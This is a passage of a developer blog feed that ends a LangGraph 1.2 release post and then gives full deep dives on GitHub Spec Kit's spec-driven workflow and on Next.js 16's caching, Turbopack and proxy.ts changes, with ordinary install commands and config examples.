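        self._value = self._value + list(new_items)
        step = len(self.records) + 1
        if step % self.snapshot_frequency == 0:
            self.records.append(("snapshot", list(self._value)))
        else:
            self.records.append(("delta", list(new_items)))

    def read(self) -> tuple:
        """Rebuild the value from the latest snapshot plus later deltas.

        Returns (value, number of delta records replayed).
        """
        value, start = [], 0
        for index in range(len(self.records) - 1, -1, -1):
            if self.records[index][0] == "snapshot":
                value, start = list(self.records[index][1]), index + 1
                break
        tail = self.records[start:]
        for _, payload in tail:
            value.extend(payload)
        return value, len(tail)

    def stored_items(self) -> int:
        """Total items written across all records (a proxy for write cost)."""
        return sum(len(payload) for _, payload in self.records)


log = DeltaLog(snapshot_frequency=5)
for step in range(1, 13):
    log.append_step([f"m{step}"])

value, replayed = log.read()
full_rewrite_cost = sum(range(1, 13))  # re-serializing the whole list on every step

print(len(value), replayed)                   # 12 2
print(log.stored_items(), full_rewrite_cost)  # 25 78
```

With one message per step over 12 steps, the log writes 25 items against 78 for full re-serialization, and a read replays at most `snapshot_frequency - 1` deltas. A smaller K lowers read work at the cost of more snapshot writes.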

6. Streaming API v3 — content-block-centric, typed projections

Streaming chunk shapes used to differ per mode, making UI integration awkward. 1.2's new event streaming API activates when you pass version="v3" to stream_events() / astream_events(), offering a content-block-centric protocol with typed, per-channel projections. The four first-class projections are run.values, run.messages, run.lifecycle, and run.subgraphs, plus opt-in transformers for updates, custom events, checkpoints, tasks, and debug. Notably, run.messages yields one ChatModelStream per LLM call, with typed sub-projections for text, reasoning, tool calls, and usage. version="v1" and "v2" are unchanged, so migration is gradual.

# content-block-centric streaming — run.messages is one ChatModelStream per LLM call
async for event in graph.astream_events(inputs, config, version="v3"):
    for part in event.run.messages:          # ChatModelStream
        if part.text:        yield_to_ui(part.text)        # body text
        if part.reasoning:   debug(part.reasoning)         # reasoning trace
        if part.tool_calls:  trace_tools(part.tool_calls)  # tool calls
        if part.usage:       meter(part.usage)             # token usage / cost

Projection	Content	Typical use
`run.values`	Current graph state values	Render final/intermediate state
`run.messages`	One `ChatModelStream` per LLM call	Token streaming UI, cost metering
`run.lifecycle`	Node start/end lifecycle events	Progress, observability
`run.subgraphs`	Per-subgraph events	Multi-agent / nested graph tracing

7. The ecosystem — langchain 1.3 and deepagents 0.6 shipped the same day

1.2 didn't ship alone. On the same day, May 12, 2026, langchain v1.3.0 added version="v3" support in stream_events() / astream_events() for create_agent-based agents, and deepagents v0.6.0 added (1) an experimental CodeInterpreterMiddleware that enables code execution and programmatic tool calling through a scoped QuickJS runtime, and (2) the same version="v3" streaming support. So v3 streaming is aligned across the LangGraph runtime, the LangChain agent layer, and Deep Agents at once — whichever layer you start from, you consume the same content-block protocol.

8. ManoIT internal adoption checklist

#	Task	Owner	Done criteria
1	Pin to `langgraph` 1.2.0 / `langchain` 1.3.0 (confirm no breaking changes)	Platform	Lockfile + CI green
2	Convert external tool/LLM nodes to async (timeout prerequisite)	Domain owners	100% target nodes async
3	`run_timeout` on tool nodes, `idle_timeout` on streaming nodes	Domain owners	0 infinite waits (load test)
4	`error_handler` + compensation node on irreversible steps (payment, booking)	Backend	Auto-rollback on fault injection
5	Wire SIGTERM -> `request_drain()`, verify resume	SRE	0 work loss during rolling deploy
6	Apply/tune `DeltaChannel(snapshot_frequency=K)` on long channels	Platform	Lower checkpoint p99 write time
7	Migrate stream consumption to `version="v3"` (run v2 in parallel)	Frontend/BFF	Unified token UI + usage metering
8	PoC deepagents `CodeInterpreterMiddleware` (sandbox isolation)	AI team	QuickJS isolation + resource limits verified

9. Conclusion — "an agent isn't a function; it's a durable graph that dies and revives per node"

In one line, LangGraph 1.2 is "the release that pushed fault tolerance down from the whole graph to individual nodes, finally lifting agent execution into truly operable durable execution." run_timeout/idle_timeout separate "infinite wait" from "legitimately long response," error_handler folds post-failure compensation into the graph topology, and request_drain() turns deploys into work-loss-free events. DeltaChannel tackles long-thread checkpoint cost, and Streaming v3 cleans up the previously inconsistent stream shapes.

Three operational recommendations to close. (1) Make nodes async before adopting timeouts — timeouts are async/Python-only, so without this prerequisite they're inert. (2) Always pair irreversible steps with a compensation node — piling on retries without an error_handler just turns "graph explodes after 3 failures" into a production incident. (3) Wire request_drain() into your deploy pipeline first — it's the smallest change that buys the most stability. The shortest one-liner: this sprint, attach a TimeoutPolicy and an error_handler to your single most stall-prone tool node, wire a drain into rolling deploys, and measure zero work loss.

This article was produced by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official LangChain changelog (docs.langchain.com — langgraph v1.2.0 / langchain v1.3.0 / deepagents v0.6.0, May 12, 2026 entries), the langchain-ai/langgraph GitHub Releases, and the LangGraph durable execution / persistence / human-in-the-loop docs as primary sources. API names, signatures, and behaviors reflect the official changelog as of publication (2026-06-01); DeltaChannel and v3 streaming are explicitly beta and may change. Code samples are illustrative, based on documented signatures — verify the latest API and beta status on docs.langchain.com and GitHub Releases before production use. Timeouts and error handlers are Python-only; timeouts work on async nodes only.

Originally published at ManoIT Tech Blog.

GitHub Spec Kit Deep Dive — Spec-Driven Development, the Constitution, /speckit.* Slash Commands, and the Specify CLI for Taming AI Coding Agents

daniel jeong — Sun, 31 May 2026 13:03:24 +0000

As AI coding agents become routine, the most common failure mode is vibe coding: you start with a one-line prompt and the code itself silently becomes the spec. Code is inherently a binding artifact — once an implementation is locked in, every shifting requirement triggers expensive rework. GitHub Spec Kit flips this on its head. Instead of treating specifications as throwaway scaffolding you discard once "real coding" begins, it promotes the specification to a first-class, executable artifact — the heart of Spec-Driven Development (SDD).

Open-sourced by GitHub in September 2025, Spec Kit has grown into the most widely adopted SDD tool as of May 2026, with 90k+ stars and 8k+ forks. Its official docs were last updated on May 27, 2026, and it now supports 30+ coding agents. This guide breaks down the Constitution, the /speckit.* slash commands, and the Specify CLI from an operations and architecture lens — plus the rollout checklist ManoIT used internally.

1. Why Spec-Driven Development in 2026

As Microsoft's developer blog puts it, SDD is not about long requirement docs nobody reads, and it's not a return to waterfall. The point is to make technical decisions explicit, reviewable, and evolvable — "version control for your thinking." If three sprints into a notification system the PM assumed per-channel toggles, the backend built a single on/off switch, and the frontend wired up OS notifications, that's not a communication failure — it's a missing shared context. SDD surfaces those assumptions when changing direction costs a few keystrokes, not entire sprints.

This matters even more with AI agents. Because the spec lives outside the code, you can generate a Rust and a Go variant from the same spec to compare performance, or explore multiple design directions in parallel — multi-variant implementation. The spec becomes the asset that steers the agent toward the right solution.

Aspect	Traditional / Vibe Coding	Spec-Driven Development
Primary artifact	Code (spec is scaffolding, discarded)	Spec (executable, generates code)
Requirement negotiation	Negotiated in code → costly rework	Negotiated in Markdown → a few keystrokes
Decision record	Email, someone's head, scattered docs	Version-controlled spec / plan / constitution
AI agents	One-shot prompt, unpredictable result	Multi-step refinement, steered by shared context
Tool lock-in	Bound to agent / IDE	30+ swappable agents, spec stays constant

2. Specify CLI — install and bootstrap

Spec Kit has two pillars: (1) the Specify CLI (Python-based, MIT-licensed, package specify-cli) that scaffolds a project for SDD, and (2) a bundle of templates and helper scripts defining what a spec, plan, and task list look like. There is no magic beyond these two parts. Prerequisites:

Linux / macOS / Windows (native or WSL)
A supported AI coding agent (Copilot, Claude, Gemini, Codex, Cursor, Windsurf, and 30+ others)
uv (recommended) or pipx for persistent install · Python 3.11+ · Git

# Persistent install (recommended) — replace vX.Y.Z with the latest Releases tag
uv tool install specify-cli --from git+https://github.com/github/spec-kit.git@vX.Y.Z

# Or bootstrap directly with a one-off run (uvx)
uvx --from git+https://github.com/github/spec-kit.git specify init my-project

# Initialize a project and pick your agent
specify init my-project --integration copilot
cd my-project

# List integrations available in your installed version
specify integration list

Initialization creates a .specify/ folder plus an agent-specific folder (e.g. .github/ for Copilot). .specify holds the spec/plan/tasks templates and the scripts for your platform (bash for POSIX, PowerShell for native Windows). And one file you may not have seen before — memory/constitution.md — is the keystone.

# Structure created after `specify init` (abridged)
my-project/
├── .github/                      # agent-specific: slash-command prompt definitions
│   └── prompts/
│       ├── specify.prompt.md
│       ├── plan.prompt.md
│       └── tasks.prompt.md
└── .specify/
    ├── memory/
    │   └── constitution.md       # non-negotiable principles (project constitution)
    ├── scripts/                  # bash or powershell helpers
    └── templates/                # spec / plan / tasks / agent-file templates

On init, Specify ensures you're inside a Git repository (creating one if needed). The helper scripts then force all work onto the same feature branch and keep subsequent prompts correctly referencing the spec, plan, and data contracts created earlier.

3. The Constitution — lock non-negotiables before any code

In SDD, the Constitution captures a project's non-negotiable principles: "web apps always follow this testing approach," "every app this team builds is CLI-first," and so on — pinned down before any SDD iteration begins. This is how organizations establish an opinionated stack that guides every new and existing project.

# Launch your agent in the project directory, then run this first:
/speckit.constitution Create principles focused on code quality, testing standards, user experience consistency, and performance requirements

This creates or updates .specify/memory/constitution.md, which the agent references during the specify, plan, and implement phases. The constitution isn't just a doc — it's a guardrail that binds every subsequent step. The plan produced by /speckit.plan is grounded by the constitution, suppressing decisions that violate your conventions.

4. The core workflow — /speckit.* slash commands

At launch, Spec Kit started with three commands (/specify, /plan, /tasks). As of 2026 they've settled into a namespaced /speckit.* scheme (Codex CLI in skills mode uses $speckit-*). In one line the flow is Spec → Plan → Tasks → Implement, with the constitution and quality gates wrapped above and below.

4.1 Core commands

Command	Agent skill	Role
`/speckit.constitution`	`speckit-constitution`	Create/update governing principles and dev guidelines
`/speckit.specify`	`speckit-specify`	Define the what & why — requirements and user stories (PRD)
`/speckit.plan`	`speckit-plan`	The how — implementation plan with your chosen stack/architecture
`/speckit.tasks`	`speckit-tasks`	Break the plan into an actionable task list
`/speckit.taskstoissues`	`speckit-taskstoissues`	Convert tasks into GitHub issues for tracking/execution
`/speckit.implement`	`speckit-implement`	Execute all tasks to build the feature per the plan

/speckit.specify explicitly excludes technical decisions — you write motivations and functional requirements, not the stack. Conversely /speckit.plan handles the "how" (frameworks, libraries, DB, infra) and produces extra metadata like research, data contracts, and a quickstart so teammates can start experimenting immediately.

# What / why (do NOT specify the stack)
/speckit.specify Build an app that organizes photos into albums grouped by date,
re-orderable by drag-and-drop on the main page, no nested albums, tile-style previews per album.

# How (stack / architecture)
/speckit.plan Use Vite with minimal libraries. Prefer vanilla HTML/CSS/JS.
Images are not uploaded anywhere; metadata stored in local SQLite.

# Break the plan into tasks
/speckit.tasks

# Execute the implementation
/speckit.implement

4.2 Optional commands — the quality gates

Command	Agent skill	Role / recommended timing
`/speckit.clarify`	`speckit-clarify`	Resolve underspecified areas via questions — before `plan` (formerly `/quizme`)
`/speckit.analyze`	`speckit-analyze`	Cross-artifact consistency & coverage — after `tasks`, before `implement`
`/speckit.checklist`	`speckit-checklist`	Generate requirement completeness/clarity checklists ("unit tests for English")

In practice, the recommended end-to-end flow is constitution → specify → clarify → plan → tasks → analyze → implement. Running clarify to fill spec gaps, then analyze to verify that the spec, plan, and tasks don't contradict each other before implementing, is what cuts rework the most.

flowchart TD
  A["/speckit.constitution\nproject constitution = non-negotiables"] --> B["/speckit.specify\nwhat / why (PRD)"]
  B --> C["/speckit.clarify\nresolve ambiguity"]
  C --> D["/speckit.plan\nhow (stack / architecture)"]
  D --> E["/speckit.tasks\nactionable task breakdown"]
  E --> F["/speckit.analyze\nartifact consistency / coverage"]
  F --> G{"consistent?"}
  G -->|no| B
  G -->|yes| H["/speckit.implement\nexecute tasks -> code"]
  H --> I["verify: tests + manual review\ncompare spec vs implementation"]
  I --> J{"spec satisfied?"}
  J -->|no| C
  J -->|yes| K["merge / next feature branch"]
  A -. grounding .-> D
  A -. grounding .-> H

5. Extensions and presets — organizational customization

Spec Kit can be tailored via two complementary systems — Extensions and Presets — plus project-local overrides. Templates are resolved at runtime: Spec Kit walks the priority stack top-down and uses the first match.

Priority	Component	Location
1 (highest)	Project-local overrides	`.specify/templates/overrides/`
2	Presets — customize core & extensions	`.specify/presets/templates/`
3	Extensions — add new capabilities	`.specify/extensions/templates/`
4 (lowest)	Spec Kit Core — built-in SDD commands & templates	`.specify/templates/`
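
The first-match lookup described above can be sketched as a walk over the four directories in priority order. This is a minimal illustration, not Spec Kit's actual resolver: `resolveTemplate` and the in-memory `existing` set (standing in for the filesystem) are hypothetical, and only the directory paths come from the table.

```typescript
// Directories from the priority table, highest priority first.
const TEMPLATE_STACK: readonly string[] = [
  ".specify/templates/overrides/",
  ".specify/presets/templates/",
  ".specify/extensions/templates/",
  ".specify/templates/",
];

// Hypothetical resolver: returns the first candidate path that exists.
// `existing` is an assumed stand-in for filesystem lookups.
function resolveTemplate(
  name: string,
  existing: ReadonlySet<string>,
): string | undefined {
  for (const dir of TEMPLATE_STACK) {
    const candidate = dir + name;
    if (existing.has(candidate)) {
      return candidate; // first match wins, lower layers are ignored
    }
  }
  return undefined; // no layer provides this template
}
```

With a preset and a core copy of the same template name both present, the preset path is returned; adding a copy under `.specify/templates/overrides/` would take precedence over both.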

For integrations that support skills mode, --integration <agent> --integration-options="--skills" installs agent skills instead of slash-command prompt files — so you can ship the same SDD workflow as either slash commands or skills.

6. Limits and operational caveats — "the spec is perfect, the code is empty"

SDD is not a silver bullet. The most-raised issues in the official blog's comments map directly onto real operational risks.

False done: the spec/plan/tasks docs read beautifully, the agent reports "implementation complete," yet much of the functionality is missing and there are zero tests. → Don't treat /speckit.implement as a trusted finish line. Pin "every feature ships with tests" into the constitution and compare implementation against the spec via checklist and real test runs.
What goes in the spec: a fundamental question — "user stories, or some other form?" A more detailed first prompt dramatically improves spec quality, so be concrete about the experiences critical to success and what you explicitly don't want.
Multi-agent, multi-developer: in one monorepo with devs using Cursor, Claude Code, and Gemini CLI, how do you keep a single spec? → Keep the spec outside the IDE, versioned alongside the repo. Then swapping tools still means implementing against the same contract, and the speedup comes from alignment.

In short, SDD's speed comes from alignment, not from "faster typing," and alignment holds only when a human reviews and approves the constitution and spec all the way through.

7. ManoIT internal rollout checklist

#	Task	Owner	Done criteria
1	Prep prerequisites — uv, Python 3.11+, Git; pick a standard agent	Platform	`specify integration list` works
2	Apply `specify init --integration <agent>` to a PoC repo	Lead eng	`.specify/` + agent folder created
3	Author a company-standard `constitution.md` (tests, security, CLI-first)	Architect	Shared constitution PR merged
4	Run specify→clarify→plan once on a representative feature	Domain owners	spec/plan/data contract produced
5	Mandate the `analyze` consistency gate after `tasks`	Domain owners	implement only at zero warnings
6	Standardize `checklist` + real tests to prevent "false done"	QA	impl-vs-spec comparison report
7	Version specs under `specs/` per feature branch	Platform	same spec reused after tool swap
8	Standardize internal templates via Extensions/Presets	DX	auto-applied on new-repo scaffolding
9	Wire `taskstoissues` to link tasks ↔ GitHub issues	Each team	auto-loaded onto sprint board

8. Conclusion — "intent before code, constitution above the agent"

In one line, GitHub Spec Kit is a toolkit that pins intent, plan, and principles into an executable spec before code, in order to control what AI agents output. The Constitution turns an organization's non-negotiables into a guardrail across every step, and the staged /speckit.specify → clarify → plan → tasks → analyze → implement flow separates "what/why" from "how" so each decision is reviewable. The Specify CLI bootstraps all of this across 30+ agents with near-zero config — but remember the tool itself is "not magic, just templates + scripts."

Three operational recommendations to close: (1) Start with the constitution — if you don't pin testing, security, and architecture conventions into constitution.md first, you'll be left with empty implementations behind well-written specs. (2) Don't skip clarify and analyze — resolving ambiguity and checking artifact consistency cut implementation rework the most. (3) Version specs like code — the spec must live outside the IDE in the repo so you can collaborate against the same contract even when tools change. The shortest possible advice: run specify init on one PoC repo this sprint, write your internal constitution, and complete one full pass on a representative feature.

This article was researched and written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), using the GitHub Spec Kit official docs (github.github.com/spec-kit, updated 2026-05-27), the github/spec-kit repository README (slash commands and CLI reference), the Microsoft developer blog (Den Delimarsky, 2025-09-15) and its community discussion, and SDD adoption reporting as primary sources. Command names, CLI options, directory structure, and statistics reflect official docs as of 2026-05-31; Spec Kit is explicitly an experimental project and may change. Verify the latest commands and integration status at github.com/github/spec-kit Releases before adopting in production.

Originally published at ManoIT Tech Blog.

Next.js 16 Deep Dive — Cache Components with use cache, Turbopack as the Default Bundler, middleware to proxy.ts, and 16.2's AI-Native DevTools

daniel jeong — Fri, 29 May 2026 23:52:25 +0000

Next.js 16 Deep Dive — Cache Components with use cache, Turbopack as the Default Bundler, middleware → proxy.ts, and 16.2's AI-Native DevTools Redefining the 2026 React Full-Stack Standard

TL;DR

Next.js 16 went GA on October 21, 2025. It was followed by 16.1 and then 16.2 on March 18, 2026; the 16.2.x patch line is current as of May 2026.

Cache Components and the "use cache" directive flip the App Router from implicit caching to an explicit, opt-in model — dynamic by default, cached only where you say so, with compiler-generated cache keys.

Turbopack is now the stable default bundler: 2–5× faster production builds and up to 10× faster Fast Refresh, no config required.

middleware.ts becomes proxy.ts to make the request-time network boundary explicit (Node.js runtime).

New caching APIs revalidateTag / updateTag / refresh separate SWR, read-your-writes, and uncached-refresh intents; React 19.2 (View Transitions, Activity, useEffectEvent) and React Compiler 1.0 support are stable.

16.2 turns the framework AI-native: AGENTS.md by default, browser log forwarding, and an experimental Agent DevTools CLI.

Vercel shipped Next.js 16 as GA on October 21, 2025, then followed with 16.1 and, on March 18, 2026, 16.2; the 16.2.x patch line is current as of May 2026. It's the endpoint of the arc that ran through 13 (App Router), 14 (Server Actions), and 15 (async APIs, Turbopack beta). In one paragraph: (1) Cache Components and the "use cache" directive end the implicit caching that frustrated developers most, replacing it with an explicit opt-in model; (2) Turbopack is stabilized as the default bundler, delivering 2–5× faster production builds and up to 10× faster Fast Refresh with zero configuration; and (3) middleware.ts is renamed proxy.ts to clarify its identity as a request-time proxy in front of the cache. Add (4) the revalidateTag/updateTag/refresh caching APIs, (5) React 19.2 and React Compiler stabilization, (6) a routing overhaul with layout deduplication and incremental prefetching, and (7) 16.2's AGENTS.md, browser log forwarding, and Agent DevTools. This article traces each change to its root cause from an operations/DX standpoint and lays out the step-by-step migration, validation, and rollback playbook ManoIT applied to its internal Next.js services.

1. Why May 2026's Next.js 16 matters

Through Next.js 15, the biggest friction in the App Router was "you can't predict what gets cached." Default fetch caching, the Full Route Cache, and the Router Cache were implicitly entangled, so unintended static optimization and stale data were frequent debugging targets. Next.js 16 inverts the philosophy head-on: rendering is dynamic by default and caching is an explicit opt-in. It also promotes Turbopack from beta to the default bundler, so fast startup and fast builds come with no configuration.

Version	Released	Key change
Next.js 13	2022.10	App Router & Server Components
Next.js 14	2023.10	Server Actions stable, PPR preview
Next.js 15	2024.10	async params/cookies/headers, Turbopack beta, React 19
Next.js 16	2025.10.21	Cache Components (use cache), Turbopack stable, proxy.ts, React 19.2
Next.js 16.1	2025.12	Cache Components refinement, DX, caching-API hardening
Next.js 16.2	2026.03.18	AGENTS.md by default, browser log forwarding, Agent DevTools, ~87% faster dev startup

Upgrades start with a single codemod:

# Automated upgrade codemod (recommended)
npx @next/codemod@canary upgrade latest

# ...or upgrade manually
npm install next@latest react@latest react-dom@latest

# ...or start fresh
npx create-next-app@latest

2. Cache Components — ending implicit caching with use cache

This is 16's biggest paradigm shift. The previous App Router inferred "should this page be static or dynamic"; in 16, all dynamic code executes at request time by default, and you attach "use cache" only to the pages, components, or functions you want cached. The compiler auto-generates a cache key wherever "use cache" appears, reducing manual-key mistakes.

Enabling it is one line in next.config.ts. The old experimental.dynamicIO is renamed cacheComponents, and the experimental.ppr flag is removed and absorbed into this model.

// next.config.ts
const nextConfig = {
  cacheComponents: true,
};

export default nextConfig;

In practice you declare the directive at the top of a function, component, or file. Combined with PPR (Partial Prerendering), it streams a static shell immediately while flowing dynamic parts through Suspense boundaries.

// app/products/page.tsx
import { Suspense } from 'react';
// Assumed app-specific helpers defined elsewhere: getCatalogMeta, getRealtimePrice, PriceSkeleton

// Statically cached header — rendered once
async function ProductHeader() {
  'use cache';
  const meta = await getCatalogMeta();
  return <h2>{meta.title}</h2>;
}

// Dynamic — runs on every request
async function LivePrice({ id }: { id: string }) {
  const price = await getRealtimePrice(id);
  return <span>{price}</span>;
}

export default function Page() {
  return (
    <>
      <ProductHeader />
      <Suspense fallback={<PriceSkeleton />}>
        <LivePrice id="42" />
      </Suspense>
    </>
  );
}

As a bonus, when cacheComponents is on, client navigation preserves the previous route's state via React's <Activity>. Leaving a route sets it to "hidden" rather than unmounting, so going back restores scroll and input state. Effects are cleaned up when hidden and recreated when visible again.

3. Turbopack stable — default bundler + filesystem caching

Turbopack, the Rust-based bundler replacing Webpack, is stable in 16 for both dev and production builds and is now the default for new projects. During the beta, 50%+ of dev sessions and 20%+ of production builds on Next.js 15.3+ were already on Turbopack.

Metric	Improvement	Note
Production builds	2–5× faster	Zero-config default
Fast Refresh	up to 10× faster	Most noticeable on large apps
Dev startup (16.2)	~87% faster vs 16.1	Default app

If you have a custom Webpack setup, a flag keeps Webpack alive. For large monorepos, the beta filesystem caching persists compiler artifacts to disk across restarts for extra speed.

# Keep Webpack during the migration window
next dev --webpack
next build --webpack

// next.config.ts — dev filesystem caching (beta) for large apps
const nextConfig = {
  experimental: {
    turbopackFileSystemCacheForDev: true,
  },
};

export default nextConfig;

4. proxy.ts — the end of middleware.ts and a clearer network boundary

16 renames middleware.ts to proxy.ts. The API and matcher are identical; just rename the exported function to proxy. The reason is identity — this file is a request-time proxy intercepting requests in front of the cache, not just "auth middleware," and it runs on a single Node.js runtime. middleware.ts remains for Edge runtime use cases for now but is deprecated and slated for removal.

// proxy.ts (formerly middleware.ts) — runs on the Node.js runtime
import { NextRequest, NextResponse } from 'next/server';

export default function proxy(request: NextRequest) {
  return NextResponse.redirect(new URL('/home', request.url));
}

Migration is trivial: move middleware.ts → proxy.ts, rename the export to proxy, and the logic stays the same.

5. Improved caching APIs — revalidateTag, updateTag, refresh

To match the Cache Components model, cache invalidation is organized into three APIs. The point is to clearly pick "SWR, read-your-writes, or refresh-uncached-data" based on intent.

API	Use	Semantics
`revalidateTag(tag, profile)`	Invalidate tagged cache	SWR — serve stale immediately, revalidate in background
`updateTag(tag)`	Server Actions only	read-your-writes — fresh data within the same request
`refresh()`	Server Actions only	refresh uncached data only

The biggest change: revalidateTag now requires a cacheLife profile as the second argument (the single-argument form is deprecated). 'max' is recommended for most long-lived content.

import { revalidateTag } from 'next/cache';

// ✅ Built-in profile ('max' recommended — background revalidation)
revalidateTag('blog-posts', 'max');
revalidateTag('news-feed', 'hours');

// Inline object for custom expiry
revalidateTag('products', { expire: 3600 });

// ⚠️ Note: single-argument form is deprecated
// revalidateTag('blog-posts');

For "the user must see their own change instantly" cases — form/settings saves — use updateTag inside a Server Action. To refresh only uncached dynamic values like a notification count, use refresh.

'use server';
import { updateTag } from 'next/cache';
// Assumed app-specific: `db` (data layer) and the `Profile` type come from your own modules

export async function updateUserProfile(userId: string, profile: Profile) {
  await db.users.update(userId, profile);
  // Expire + re-read immediately → user sees the change right away
  updateTag(`user-${userId}`);
}
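
The difference between the SWR and read-your-writes semantics in the table can be modeled with a toy in-memory cache. This is a conceptual sketch, not how Next.js implements its cache: the `TagCacheModel` class, its synchronous `load` callback, and the one-entry-per-tag layout are all assumptions made for illustration, and the `profile` argument is omitted.

```typescript
interface Entry {
  value: string;
  stale: boolean;
}

// Toy model of two invalidation intents. Names mirror the Next.js APIs,
// but the behavior here is a simplified assumption, not the real cache.
class TagCacheModel {
  private entries = new Map<string, Entry>();
  private load: () => string;

  constructor(load: () => string) {
    this.load = load;
  }

  read(tag: string): string {
    const entry = this.entries.get(tag);
    if (entry === undefined) {
      // Miss, or expired by updateTag: load fresh data before answering.
      const value = this.load();
      this.entries.set(tag, { value, stale: false });
      return value;
    }
    if (entry.stale) {
      // SWR: answer with the stale value, then refresh for the next reader.
      const staleValue = entry.value;
      this.entries.set(tag, { value: this.load(), stale: false });
      return staleValue;
    }
    return entry.value;
  }

  // Models revalidateTag: mark stale, the old value is served one more time.
  revalidateTag(tag: string): void {
    const entry = this.entries.get(tag);
    if (entry !== undefined) {
      entry.stale = true;
    }
  }

  // Models updateTag: expire immediately so the next read is fresh.
  updateTag(tag: string): void {
    this.entries.delete(tag);
  }
}
```

In this model, a read right after `revalidateTag` still returns the old value and only the following read sees the new one, whereas a read right after `updateTag` returns fresh data. That is why the latter suits form and settings saves.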

6. React 19.2 + React Compiler — View Transitions, Activity, automatic memoization

16's App Router runs on the latest React Canary and includes React 19.2 features. Three you'll feel in production:

View Transitions: animate elements that update inside a Transition or navigation.
useEffectEvent: extracts non-reactive logic out of Effects, easing dependency-array pain.
Activity: hides UI with display:none while preserving state and cleaning up Effects, which is the basis for the route-state preservation above.

On top of that, React Compiler 1.0 support is stable. Automatic memoization reduces unnecessary re-renders, sparing manual useMemo/useCallback, but it's not on by default (Babel dependency can lengthen builds, and data is still being gathered). Opt in:

// next.config.ts
const nextConfig = {
  reactCompiler: true, // stable but off by default — opt-in
};
export default nextConfig;

npm install babel-plugin-react-compiler@latest

7. Routing & navigation overhaul — layout dedup + incremental prefetch

16 fully rewrote routing/navigation. Two improvements apply with no code changes.

Layout deduplication: when prefetching multiple URLs sharing a layout, the layout downloads once instead of per link. A page with 50 product links downloads the shared layout once, not 50 times, slashing transfer size.

Incremental prefetching: only the parts not already cached are prefetched, not whole pages. The prefetch cache cancels requests when a link leaves the viewport, prioritizes on hover/re-entry, and re-prefetches when data is invalidated. You may see more individual requests but far lower total transfer — the right trade-off for nearly all apps.
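
The combined effect of layout deduplication and incremental prefetching can be sketched as a small planning function. This is a conceptual model only: the segment keys (such as `layout:/products`) and the `planPrefetch` function are hypothetical and do not reflect the Next.js router's internal data structures.

```typescript
// A route is modeled as an ordered list of segment keys,
// for example a shared layout followed by the page itself.
type Route = readonly string[];

// Returns the segments to fetch: each distinct segment once (dedup),
// skipping anything already in the prefetch cache (incremental).
function planPrefetch(
  routes: readonly Route[],
  cached: ReadonlySet<string>,
): string[] {
  const toFetch: string[] = [];
  const seen = new Set<string>();
  for (const route of routes) {
    for (const segment of route) {
      if (cached.has(segment) || seen.has(segment)) {
        continue;
      }
      seen.add(segment);
      toFetch.push(segment);
    }
  }
  return toFetch;
}
```

For 50 product links that each consist of one shared layout segment and one page segment, this plan contains 51 segments instead of 100, and 50 if the layout is already cached.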

8. 16.1 & 16.2 — toward an AI-native framework

16.1 refined Cache Components and polished caching APIs and DX. Then 16.2 (March 18, 2026) made the direction explicit — "make the framework itself easy for AI coding agents to operate."

16.2 feature	Description	Effect
AGENTS.md by default	`create-next-app` ships version-matched docs to agents	100% internal eval pass (vs 79% skill-based)
Browser log forwarding	Client errors forwarded to the dev terminal by default	See client errors without switching to the console
Agent DevTools (experimental)	`next-browser` CLI exposes screenshots, network, console, component tree	LLM parses CLI output instead of a panel
Performance	~87% faster dev startup vs 16.1	Default app

Browser log forwarding level is configurable:

// next.config.ts
const nextConfig = {
  logging: {
    // 'error' (default) | 'warn' | 'verbose' | false
    browserToTerminal: 'warn',
  },
};
export default nextConfig;

The key insight: an LLM can't "read" a DevTools panel, but it can parse the text output of next-browser tree. Each command is a one-shot request against a persistent browser session, so agents can query the app repeatedly without managing browser state — which dovetails neatly with our CLAUDE.md token-optimization principles (structured input, result caching).

9. Migration decisions — breaking changes and flow

As a major release, 16 carries non-trivial compatibility changes. The most important:

Area	Change	Action
Runtime	Node.js 20.9+ / TypeScript 5.1+ required	Node 18 dropped — upgrade runtime first
Bundler	Turbopack default	Custom Webpack opts out via `--webpack`
Middleware	`middleware.ts` deprecated	Rename to `proxy.ts` + function name `proxy`
Cache	`revalidateTag` signature change	Add second arg: a `cacheLife` profile
Lint	`next lint` removed	Use Biome/ESLint directly — codemod provided
Images	`images.qualities` default `[75]`, `minimumCacheTTL` 4 hours	Re-verify quality/cache policy
Parallel routes	every slot requires `default.js`	Build fails without it — add `notFound()`/`null`
AMP	removed entirely	All AMP APIs (`useAmp`, etc.) deleted

Below is the upgrade decision flow our team uses.

flowchart TD
    A[Next.js 15 service] --> B{Node 20.9+/TS 5.1+?}
    B -->|No| C[Upgrade runtime first]
    C --> B
    B -->|Yes| D[codemod: npx @next/codemod@canary upgrade latest]
    D --> E{Custom Webpack config?}
    E -->|Yes| F[Interim: keep --webpack + verify Turbopack gradually]
    E -->|No| G[Adopt Turbopack default]
    F --> H[Rename middleware.ts -> proxy.ts]
    G --> H
    H --> I[Add cacheLife profile to revalidateTag]
    I --> J{Redesign caching?}
    J -->|Yes| K[cacheComponents: true + adopt use cache gradually]
    J -->|No| L[Keep default dynamic model]
    K --> M[staging build/perf regression test]
    L --> M
    M --> N{Zero regressions?}
    N -->|No| O[Root-cause and fix]
    O --> M
    N -->|Yes| P[Gradual prod rollout + monitoring]
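
The first gate in the flow (Node.js 20.9+ and TypeScript 5.1+) can be checked with a small preflight helper before running the codemod. This is a minimal sketch: `parseVersion`, `meetsMinimum`, and `preflight` are hypothetical names, and the comparison handles plain numeric versions only, ignoring pre-release tags.

```typescript
// Parse "20.9.0" or "v20.9.0" into numeric parts; unparsable parts count as 0.
function parseVersion(version: string): number[] {
  return version
    .replace(/^v/, "")
    .split(".")
    .map((part) => Number.parseInt(part, 10) || 0);
}

// Numeric, part-by-part comparison (so 20.10 is newer than 20.9).
function meetsMinimum(version: string, minimum: string): boolean {
  const a = parseVersion(version);
  const b = parseVersion(minimum);
  const length = Math.max(a.length, b.length);
  for (let i = 0; i < length; i++) {
    const left = a[i] ?? 0;
    const right = b[i] ?? 0;
    if (left !== right) {
      return left > right;
    }
  }
  return true; // all parts equal
}

// Returns a list of blocking problems; an empty list means the gate passes.
function preflight(nodeVersion: string, tsVersion: string): string[] {
  const problems: string[] = [];
  if (!meetsMinimum(nodeVersion, "20.9")) {
    problems.push(`Node.js ${nodeVersion} is below 20.9`);
  }
  if (!meetsMinimum(tsVersion, "5.1")) {
    problems.push(`TypeScript ${tsVersion} is below 5.1`);
  }
  return problems;
}
```

In a real script you would likely pass `process.versions.node` and the TypeScript version from your lockfile, then fail the CI job if the returned list is non-empty.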
